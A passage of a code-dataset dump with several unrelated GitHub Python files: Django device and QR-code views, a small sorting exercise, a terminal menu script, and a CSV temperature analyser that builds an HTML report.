excluir_dispositivo(request, dispositivo_id):\n dispositivo = get_object_or_404(CadastroDispositivo, pk=dispositivo_id)\n if request.method == 'POST':\n dispositivo.delete()\n return redirect('listar_dispositivos_e_falhas')\n return render(request, 'dispositivo/excluir_dispositivo.html', {'dispositivo': dispositivo})\n\n@login_required\n@user_has_permission('dispositivo.view_cadastrodispositivo')\ndef listar_dispositivos_e_falhas(request):\n dispositivos = CadastroDispositivo.objects.all()\n return render(request, 'dispositivo/listar_dispositivos_e_falhas.html', {'dispositivos': dispositivos})\n\n@login_required\n@user_has_permission('dispositivo.view_cadastrodispositivo')\ndef detalhes_dispositivo(request, dispositivo_id):\n dispositivo = CadastroDispositivo.objects.get(pk=dispositivo_id)\n qr_code_obj = QRCode.objects.get(dispositivo=dispositivo)\n falhas = Falha.objects.filter(dispositivo=dispositivo)\n manutencoes = Manutencao.objects.filter(falha__dispositivo=dispositivo)\n if request.method == 'POST':\n falha_form = FalhaForm(request.POST, prefix='falha')\n manutencao_form = FormManutencao(request.POST, prefix='manutencao')\n if falha_form.is_valid():\n nova_falha = falha_form.save(commit=False)\n nova_falha.dispositivo = dispositivo\n nova_falha.save()\n falha_form = FalhaForm()\n elif manutencao_form.is_valid():\n nova_manutencao = manutencao_form.save(commit=False)\n nova_manutencao.dispositivo = dispositivo\n nova_manutencao.save()\n manutencao_form = FormManutencao()\n else:\n falha_form = FalhaForm(prefix='falha')\n manutencao_form = FormManutencao(prefix='manutencao')\n context = {\n 'dispositivo': dispositivo,\n 'qr_code_obj': qr_code_obj,\n 'falhas': falhas,\n 'falha_form': falha_form,\n 'manutencoes': manutencoes,\n 'manutencao_form': manutencao_form\n }\n return render(request, 'dispositivo/detalhes_dispositivo.html', context)\n\n@login_required\ndef imprimir_qr_code(request, dispositivo_id):\n dispositivo = get_object_or_404(CadastroDispositivo, pk=dispositivo_id)\n qr_code_obj = QRCode.objects.get(dispositivo=dispositivo)\n qr_code_image = base64.b64decode(qr_code_obj.qr_code_base64.encode('utf-8'))\n response = HttpResponse(qr_code_image, content_type='image/png')\n response['Content-Disposition'] = f'attachment; filename=\"qrcode_dispositivo_{dispositivo_id}.png\"'\n return response\n","repo_name":"IgorMiranda267/Sistema-Web","sub_path":"crud/dispositivo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6026,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"4466097351","text":"# Write a program that receives a sequence of numbers (integers) separated by a single space. \n# It should print a list of only the even numbers. Use filter().\n\n\ndef sorting(nums):\n nums = sorted(nums)\n return nums\n\n\nnumbers = [int(el) for el in input().split()]\nprint(sorting(numbers))\n","repo_name":"boyan-petkov/Python","sub_path":"Fundamentals/Lab and Exercises/Functions - Exercise/sort.py","file_name":"sort.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"15696032375","text":"import os\nfrom containers import *\n\nfrom time import sleep\n# import sys\ndef title(): \n os.system('clear')\n os.system('tput setaf 4') # color blue\n print('Welcome to flash inteface'.center(os.get_terminal_size().columns))\n os.system('tput sgr0') # reset color\n\ndef exitProtocol():\n print('Exiting. . .')\n sleep(0.4)\n os.system('clear')\n exit()\n\ndef menuOne():\n return int(input(''' choose from these options:\n [1] Container Operations\n [2] Newtorking Opetations\n [3] User Modifications\n [4] Web-Server Options\n [5] Miscellaneous\n [0] exit\\n'''))\n \n\nwhile True:\n title()\n oneAns = menuOne() \n if (oneAns == 0): # zero is the exit protocol\n exitProtocol()\n elif (oneAns == 1):\n os.system('clear')\n while True:\n try:\n if container(containerOption()):\n pass\n else:\n break\n input('press any key to continue..')\n os.system('clear') \n except ValueError: \n os.system('clear') \n continue\n else:\n print('you have choosen: {0}'.format(oneAns))\n print('test')\n input()\n os.system('clear')\n","repo_name":"smc181002/rhel_tui","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"17659205043","text":"import sys\nimport csv\n\nfile_name = sys.argv[1]\n\narray_of_data = []\nset_to_count_num_of_devices = set()\nlist_from_entry_to_temperature = []\ndict = {}\nmax_temperature = 0\nnum_of_card = 0 # equals to length of resulting list\nhottest_card_or_device = \"\"\nlist_of_output_table = []\n\nwith open(file_name) as file:\n csv_reader_object = csv.reader(file)\n for row in csv_reader_object:\n if row[0] == \"Device;Card;Temperature\":\n print(\" \")\n else:\n list_of_each_row = row[0].split(\";\")\n # max temperature check\n if max_temperature < int(list_of_each_row[2]): # assumme temperature is integer\n max_temperature = int(list_of_each_row[2])\n hottest_card_or_device = list_of_each_row[1] + \"/\" + list_of_each_row[0]\n\n array_of_data.append(list_of_each_row)\n if list_of_each_row[0] in set_to_count_num_of_devices:\n temp_list = dict[list_of_each_row[0]]\n temp_list[0] = temp_list[0] + 1\n if int(list_of_each_row[2]) >= 70:\n temp_list[1] = temp_list[1] + 1\n if temp_list[2] < int(list_of_each_row[2]):\n temp_list[2] = int(list_of_each_row[2])\n\n temp_list[3] = temp_list[3] + int(list_of_each_row[2]) # average temp\n dict[list_of_each_row[0]] = temp_list\n else:\n set_to_count_num_of_devices.add(list_of_each_row[0])\n temp_list = [1]\n if int(list_of_each_row[2]) >= 70:\n temp_list.append(1)\n else:\n temp_list.append(0)\n temp_list.append(int(list_of_each_row[2])) # max temp\n temp_list.append(int(list_of_each_row[2])) # average\n dict[list_of_each_row[0]] = temp_list\n\nfor i in dict:\n avg_temp = dict[i][3] // dict[i][0]\n temp_list = dict[i]\n temp_list[3] = avg_temp\n dict[i] = temp_list\n\n# FInd total devices, total cards , max card temperature, hottest card/device\nnum_of_devices = len(set_to_count_num_of_devices)\nnum_of_card = len(array_of_data)\n\n\nanalytics_list = [str(num_of_devices), str(num_of_card), str(max_temperature), hottest_card_or_device]\n\nmylist = []\nfor i in dict:\n tmp_ls = [i]\n tmp_ls.extend(dict[i])\n mylist.append(tmp_ls)\n\n\noutput_name_ls = file_name.split(\".\")\noutput_file = output_name_ls[0]+\".html\"\nf = open(output_file, 'w')\n\n\n\ndef html_table(lol, analytics_list_for_html_creation):\n f.write(\"Summary\")\n f.write(\"